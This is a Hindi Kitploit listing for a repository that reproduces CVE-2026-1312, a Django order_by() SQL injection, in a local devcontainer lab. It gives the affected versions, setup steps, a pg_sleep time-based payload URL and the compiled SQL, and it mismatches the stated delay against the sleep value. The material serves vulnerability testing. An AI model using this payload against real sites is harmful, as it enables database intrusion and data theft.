Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/sw0rd1ight/cve-2026-1312
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubsw0rd1ight/cve-2026-1312

CVE-2026-1312

CVE-2026-1312 को पुनः उत्पन्न करता है, जो Django SQL इंजेक्शन भेद्यता है, जिसमें Dockerized वातावरण और सुरक्षा परीक्षण के लिए चरण-दर-चरण PoC शामिल है।

रिपॉजिटरी देखें
247 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-1312 एक उच्च-जोखिम वाला Django SQL इंजेक्शन भेद्यता है: जब QuerySet.order_by() में डॉट वाले कॉलम उपनाम का उपयोग किया जाता है, और FilteredRelation के साथ डिक्शनरी के माध्यम से गतिशील रूप से क्वेरी बनाई जाती है, तो हमलावर द्वारा दुर्भावनापूर्ण SQL इंजेक्ट किया जा सकता है

प्रभावित संस्करण:

  • Django 6.0 शाखा में 6.0.2 से पहले के संस्करण
  • Django 5.2 शाखा में 5.2.11 से पहले के संस्करण
  • Django 4.2 शाखा में 4.2.28 से पहले के संस्करण

पर्यावरण प्रारंभ

यह भेद्यता प्रोजेक्ट vscode के devcontainer का उपयोग करके बनाया गया है

1️⃣ प्रोजेक्ट खोलें VS Code से पहले से मौजूद प्रोजेक्ट रूट निर्देशिका (.devcontainer फ़ोल्डर सहित) खोलें।

2️⃣ कंटेनर फिर से खोलें (Dev Container बनाएं)

Ctrl+Shift+P (Windows/Linux) या Cmd+Shift+P (Mac) दबाएं

Remote-Containers: Reopen in Container टाइप करें

VS Code .devcontainer कॉन्फ़िगरेशन पढ़कर कंटेनर बनाएगा (पहली बार बनाने में कुछ मिनट लग सकते हैं)

⚠️ यदि Dockerfile या निर्भरताएं अपडेट हुई हैं, तो Remote-Containers: Rebuild Container चुनें, ताकि नवीनतम वातावरण सुनिश्चित हो।

3️⃣ Django विकास सर्वर चलाएं

कमांड पैलेट Ctrl+Shift+P खोलें

Tasks: Run Task टाइप करें

django:start चुनें (कार्य .vscode/tasks.json में कॉन्फ़िगर किया गया है)

यह कार्य कंटेनर के अंदर Django विकास सर्वर प्रारंभ करेगा

डिफ़ॉल्ट रूप से 0.0.0.0:8086 पर सुनता है

4️⃣ ब्राउज़र खोलकर प्रोजेक्ट तक पहुंचें

ब्राउज़र खोलकर पहुंचें:

http://localhost:8086

5️⃣ ध्यान देने योग्य बातें

पहली बार चलाने पर:

डेटाबेस माइग्रेशन करने की आवश्यकता हो सकती है:

python manage.py migrate

भेद्यता पुनरुत्पादन

/book/search इंटरफ़ेस तक पहुंचें, http://localhost:8086/book/search?name=vuln_book.id,pg_sleep(2)

तो देखा जा सकता है कि 3 सेकंड की देरी सफलतापूर्वक होती है

इस समय django orm द्वारा संकलित अंतर्निहित sql है

SELECT "vuln_book"."id", "vuln_book"."title", "vuln_book"."author_id" FROM "vuln_book" ORDER BY ("vuln_book".id,pg_sleep(2)) ASC
टूल डाउनलोड करें